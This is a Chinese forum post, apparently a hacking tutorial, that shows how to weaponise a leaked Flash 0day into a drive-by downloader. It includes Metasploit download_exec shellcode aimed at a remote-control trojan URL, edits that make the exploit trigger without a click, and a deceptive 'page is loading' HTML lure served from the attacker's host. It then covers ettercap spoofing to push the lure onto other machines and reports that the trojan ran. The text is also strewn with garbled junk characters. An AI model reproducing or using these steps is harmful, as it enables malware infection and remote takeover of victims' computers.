|
7 j# D% d2 L' ^: I% O# K4 \& n) Y 三、flash 0day之手工代码修改制作下载者实例入侵演示
. [* D8 W" J/ b! `5 P! Q8 W " J$ t5 e! _- F8 I9 c3 Z5 A
2 _. h* _7 I6 u- a4 k: t 利用到的工具: ; i2 I7 x" v( e9 T+ |9 K. t, N
7 k2 \# S/ l, w2 y/ A) Z
/ C; T5 ]+ f( [4 d; d
Msf
3 C ]0 m* [( R/ j
0 A8 \. y. D9 d e7 S3 Q+ U, A" T; a5 m' q- {, _6 z& f4 b
Ettercap
* c I$ N" g7 R5 l
9 y1 W" d% ]9 f# i5 A3 Q3 `
1 u* q1 k9 R/ v# Q# g+ ~# w Adobe Flash CS6
3 N+ o( H+ B! y% S " X& [% ^8 M4 W
5 S) |1 O* V$ S( Q) X; u
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
* }, |" Y/ f& G: T
! z! f( v* k: [7 ]% \6 E- Q6 V5 @( a8 q! \
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
" m0 ^5 C# W! A% ^8 w ( V7 V% @4 ~" O) X T/ n7 i
L, l2 ^( q7 |6 G H
如图:
" J" }# ?4 Q7 N7 J" B" v
9 @/ w1 F& D/ B. G
0 g( l; C/ o5 R; Z, t % m8 ]2 s i" V V8 [3 t
. t! E% j' U, ?. @2 q
- V# m; Z4 o7 g& {* M }  0 [0 s! N3 Q. Q1 z9 V/ P n) r
! R+ @2 m1 ]' b( N- `1 y
2 \, a0 P' }! l/ d7 h 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / `" x/ Q' X$ ?5 @7 C1 y
$ A! n+ b+ u8 R; F( L) D- b* ~
2 e2 x& E% }8 y' K# p5 {7 v 6 R7 Y; h$ _) X
* h( q6 l0 j7 H2 N4 a! J) d: M N( L. N$ @! ]0 T7 X/ O
 8 d) Z: w/ |" e( O# S3 f5 u2 m
# S- f, ~. D. H# O& a4 _- N! N: c! \" g% d- @, h7 s! a) R: T
然后执行generate -t dword生成shellcode,如下:
+ r8 G1 }+ w k$ e! T 0 T/ |% J# \5 I& d4 K: V
' s ?; L( s0 _9 G: i 
* y. \2 f7 r; [- ^# p/ e- n + j% X+ V; A; Z+ ]7 [+ A$ N" e
6 [% \( e9 s& h# f; [ 复制代码到文本下便于我们一会编辑flash exp,如下:
/ W% x2 F& j7 t4 Q# J ' y5 M u9 ~; a5 |9 g9 _
3 t# J, A Q. h
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
8 U& c5 i% W Y
" K$ C9 m% _2 e
# c* V! @: x! ? 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, \# r x' d. N0 V: a3 G1 G/ `
2 d1 X8 ?7 |2 ?5 Z7 p
) O6 m5 ]) M# e$ J$ B: @! |5 L; I6 a 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, * }1 s0 g, s7 [- l* U2 H: |
* b# x+ a( v+ V' C, Q* t2 ^; E3 y5 W* A. }1 p$ u
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, k1 q" |# j+ ?6 ~" Y4 R" I+ n! R
) P3 D8 I& k: g* {8 ]0 I* z% K' A4 `
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % H) P% `' O0 t1 @5 q- a
6 Q. o1 y5 f& b9 [- i8 Z; t: Z! i; T. T
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, , }- G) [( I- X7 Q
, z5 v9 i% c, o! l& B) n* E
9 a* J7 Z1 x0 x+ g$ B
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 4 K- o7 t' K- Z/ \+ ]/ s
# v! R, a5 u0 c. t& h
- s7 R! [( P" R& w 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
( @1 Y8 `1 X# o3 _, k* s! a
! z$ |# V, [) `3 `2 k
+ X+ j3 [, C$ P4 w0 D4 ~ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 4 H+ ~. N* G; {' k( b' M
& K- }9 [( `5 E; x/ F9 l7 ~+ X6 B9 J" T! t
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 8 N+ ]* c( h1 L: w
* a2 ^6 N4 {! u1 b) l. v; a D" l" V3 m8 n4 h$ K3 [! ?5 S+ I
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, b4 J- D4 v7 p& A( C
( w' k& k0 B2 V2 ?* n7 }2 S
! b/ ~. L& V% r& E) @
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
' `! A6 q0 d# H3 w$ V% N9 u
4 H- M+ G9 I0 Q4 o- w* M6 o6 x C/ J8 K
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
* a! A6 H; n; ?5 n6 d# S* _* k! |+ C 3 S7 B8 f8 H( e1 I5 o% y9 F. ?
1 @% |! d/ \; Y3 F- O6 O2 G
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 " @% P/ m" I* A ^; q9 n" l
" @2 r$ Z9 ]% ]3 Z$ \
" m2 o- |! a; {# P- `
7 N2 R5 n1 |. u. p4 u! ~3 ]
, Z: K) ^7 Z7 D b+ n) v) S) K- F* }/ |+ a% D
8 U- f1 M: ]( E! @5 c4 Q
- Z7 P- P; ^: F! E# r, v: J$ o/ K9 V7 S, H1 M3 `1 m
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
7 k+ ~1 v, m4 S4 N& P ) M+ N* b2 ?6 e/ H0 _( _5 w( @: W
! r/ P, T$ q- N& l; I+ q. W. `
 # {6 ]: L4 O3 M
; {' g. d" c4 h
) Z( W6 h* [; ^9 I) w 先修改ShellWin32.as,部分源代码如图:
: m+ z$ D$ M# I9 w: U3 J% T
" Q/ }/ E" l5 Y9 E& W. u: G& Y+ G3 y. v+ U& v
! u9 r; g& H* M& z $ E. o2 [7 c. Q# T s& Y$ @+ G
6 u# F; h. P% u1 n7 C 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; V# q. r! P t/ |
& i7 n4 X& ~! J7 x# \& |% h
; N9 ^1 j3 b2 R& m# b  5 ~( Q" B: [: H9 N7 `* W5 W6 v
; I4 {5 N/ \: E6 y9 X+ j: A) y1 K9 i" s3 ~* k9 F8 p: i- S4 w
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
* f) h) o9 F F
) V5 z- [3 a) U4 C% C1 M# L: H6 u' `- x! |4 O1 a4 U
 0 r: u. _: O# E4 J
# ~* i' o3 Y) B1 ?/ ?8 l
! y9 G- Y' D& C1 U, G
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: : F) r4 w' N3 S# M4 c+ v
; g# M. y8 L% x5 v% \) J" `
5 q2 J* F R2 U7 R1 @
5 i: i1 @5 m4 g: @ 6 y- H( ~9 K" \; g; @9 q, Z/ w
" `' r, E/ m9 i: @ S
0 [1 C8 f- S9 M3 y5 F6 V9 v% y/ h
, V4 C2 Y% b/ u8 j- d* {
o4 a: B8 h/ X: }! g0 e 
: p! Y6 H. {% l( D; w- a6 z6 \. [
4 A3 |6 {7 Y9 |1 G) R# X" R a) g
! r3 B% N" c: _' v6 V5 x8 G+ b 然后点保存,下面我们来编译一下,打开 & k6 V8 F2 f8 x+ A6 s' q
8 T f( F6 X1 J& D& w" A
! N" P0 v: N* r+ r' k1 C1 X( j- `
exp1.fla然后点文件-发布,看看编译没错误 8 i, `/ H/ W% `- m0 y
0 {' A2 Y! W+ K+ }( T' I- T8 N# k, F* E; l6 e. b8 v
: F; `7 X' K8 g6 i7 P5 \4 \* U3 y Q' J
, c7 ~, y0 v W& d1 }5 i2 L8 m
: ~1 m2 }9 F( ^) k: S7 q# T$ f8 B" v * _+ A) R$ y5 z7 F* e# q: a
' b2 a2 j/ [5 p5 P) d8 T- e! E7 |
# V& o5 o' Q5 U1 |2 l
2 [6 I. ^) I" w! C$ N
' A$ m- o/ Y0 M+ b2 J9 ~% P( i8 W6 K6 ?
 ' f5 p/ H# y: s% i; M" _
1 g$ B+ ^" Q. b A) d# e. w6 J
9 N B' ~& e3 b- x9 ?: d 然后我们把生成的 + _* a4 B* p, E9 m* p/ [
$ h* |3 q7 l1 D3 W
$ G/ H6 V% w f5 f" N5 j9 k exp1.swf丢到kailinux 的/var/www/html下: 8 i) u- K) s* }( R
1 C& e6 o3 M- _9 X
2 d+ i! q" L* O" L3 { 然后把这段代码好好编辑一下 6 k4 U0 n! s2 T# d P. v4 n0 h
4 c! n8 T2 r8 e# P o9 `& ?" C; g+ G4 r. o$ N1 O: s& R1 A
# R! u" \8 i7 ~2 A8 b ! H/ n9 }" Y2 A' \! }
" r3 C. e& a8 q. }$ m! |2 _
) i9 K+ R* @& F2 ^
% S: I. H9 C6 K8 o8 @6 Z# p+ L7 _4 S5 d
$ f- ^" ^9 a3 @
1 S" _ ^& o7 R
7 F; n# v: Q% i! { z9 e) z# O
% R b6 }1 q0 z: R) o/ K
) j+ \) G3 K) _/ | H6 A# g& Y7 p" J
8 a. a2 a6 d& j6 q7 U
2 `1 s, ]4 \7 A. l) W7 R! x) ?0 O* y/ f4 A% p
8 H' B1 F7 V) P. z
8 |4 w' g, G9 b/ A
; A) a1 U7 t4 ]9 G. Q7 J <!DOCTYPE html> 4 H1 S* g: ~+ D+ [3 Y
6 ~. @. q7 p& v4 i$ g/ r9 C, D# G
+ `$ O+ E! M# _. G8 w! I, {7 U
<html>
, u# K/ @7 @2 y8 Y% S& `" a + A* B( u/ U( J' @4 `3 Y
' U% z& }+ Q) c5 Z. O+ t <head>
. D- [4 ?7 D3 o8 B1 I9 J* T, i
9 b2 C1 i/ L( s5 _0 x; `) b6 I" x; `. R- h% S9 M
<meta http-equiv="Content-Type" content="text/html;
: b7 p- [' Q/ g% ?
6 X- }7 t$ j3 P8 X: b% C A! O) `( q. N1 G& h) |5 C
charset=utf-8"/> 6 E# D" f! Y8 F# R
8 }2 }0 e, B( {5 b* |: \
6 e0 H6 K1 B# y' P </head> . R6 O; d! F: I
/ b, c6 ~8 H, X
: y$ b: L5 _9 ` <body>
3 G ?. @ f- O4 ~" a( m! B5 G* [ 0 I- o+ t+ c& F
; G6 w) E! _0 e, e* B <h2> Please wait, the requested page is loading...</h2>
7 B# }7 s' j. |: e5 K 2 C, z/ t3 Y, D# X' G" J
" U) ]! B$ ^8 ^% Z# [/ P) o: V
<br> % P( K# i0 B" V* q% ^ L
7 F& r, h% t) l0 ]1 [% y' i3 m2 Y6 L' L }
<OBJECT
% } U/ h% L6 U3 @6 n+ C( i( y- D 6 P# b+ k" r) d* T( m; O
6 U8 d, \5 M$ y% a
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
/ f: p N& O% y8 ^ $ z7 O9 `6 M; m1 ?- e
/ ^% P9 K. I* Z2 b6 c+ {; B VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 9 @7 r! Y) _+ @, m# ~' D0 K
) w; `/ ]* X! P, `$ K
" F. z) n, I# {: b4 e, p </body>
! i/ I- n# ^) g7 T4 q/ n
* ~% I, q/ b6 C& e! N E
" m0 Z) R7 w& U8 T <script>
' Y0 t0 _# O7 `
, d9 }& Z x. A8 ?
8 d! f. H* A7 c4 N. i# g* {7 S setTimeout(function () {
* b) E% m9 [* C) ~7 ^7 A3 V 1 c3 K$ e8 Y V
6 n" ?, z3 g& y6 _0 |2 ~ W2 ]
" d0 O- v5 ^* G. o |7 o: R
) [' z/ E6 U7 {2 d$ w3 v
. @! `0 |- \3 \; }4 A window.location.reload(); , ?, X @( n* _ g
" K' ^' ~% @8 A- A: p" d/ c, |
2 Q; L" y' f1 x! z* r( p* v0 n' E }, 10000); % f" ?# o+ S/ e9 D$ p3 q
3 }- ]( L# g: \; q% {% O
3 z$ S' p o. h8 |; P1 z" u
; [6 [8 E# W1 m- s+ M3 } / ?. U* g& G8 o+ y1 }) s
8 g- {; A8 c: X! Z </script>
% z' {/ r+ c T+ a6 U3 D9 H . L7 `0 O# Z( ?' X6 z: A) B0 a
$ ]/ i3 g" s- }4 m0 k$ O, {
</html>
4 A* A. ^+ }5 ?2 C* X3 U
) Y1 s3 c9 p+ W; v$ H/ p {& X
) }- B; W% b5 Y/ R9 U3 ? ; \4 [. Q0 s* e$ F0 b3 C7 h
) L7 K( g5 i4 X0 d) O' e* z
7 J' D3 @2 c8 O9 J/ G# C
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: + U& {6 Q1 T4 P" M8 K2 |4 k' v
7 v3 Y% B' t0 j( p/ @
9 X; I7 C8 h- r( S7 p
5 Y+ \ L* N6 T7 j8 E ~ 5 }& T- x& v( U+ h
/ Y+ m3 K- w' I
. i% x1 R5 |7 t
; Q4 j5 g/ D. n4 S1 R5 w
6 `( G0 W7 R( t2 t e $ z4 H& T. l9 [; A$ R
- X- N2 ?4 W$ M# g) L( k
7 s9 X( T) {+ x; ?9 @
$ A1 e( H6 G) r. j0 P
w5 N3 E' R1 l# {4 X' e
0 E$ a% J9 O/ e: N H1 P k
8 v# ~5 i- N; O. }* a6 o
) D4 ~( m) R( l. }& B
% X6 H9 S8 @, k 下面我们用ettercap欺骗如图:
P7 X5 M# G( D7 i, i. e8 W
# b+ R- e9 T) v4 Y- x# |4 p% x7 t+ h. ]9 `2 O0 u
 % z) T, G3 E+ u3 m- B1 V
1 v! k- q* a9 i" D; A1 @; E% T
6 g& y7 e- \3 L8 j: M 9 |5 T0 S( |: A
2 {6 {9 P# [: s! A3 v. ^4 j+ t; l# F! P. E1 ~
下面我们随便访问个网站看看: ) d4 [1 ~; K# T2 M' F
4 x" _2 M, y, D! Q3 Q
; h, U' S( w' ~3 `! A 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
3 M) n+ b" U1 D0 V+ ]
" j; Q" R! L7 y& U! z* ?- U
; J+ H* J2 _" e2 U/ H 
i: N' i" M* w ( k; A# {7 m; j% f0 u: L8 l% V3 X
' [" D7 ?% `8 F( k. {7 _! U 我们看另一台,
( a1 V8 \- ?) j: H9 k) d8 q( F! a5 ?
, R( l* N4 V, p( R, l) M
" i* i0 y6 n& ^5 a0 ` 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
: @7 A9 w4 A8 l$ D( ^! q | 
发表于 2018-10-20 20:28:55
收藏
支持
反对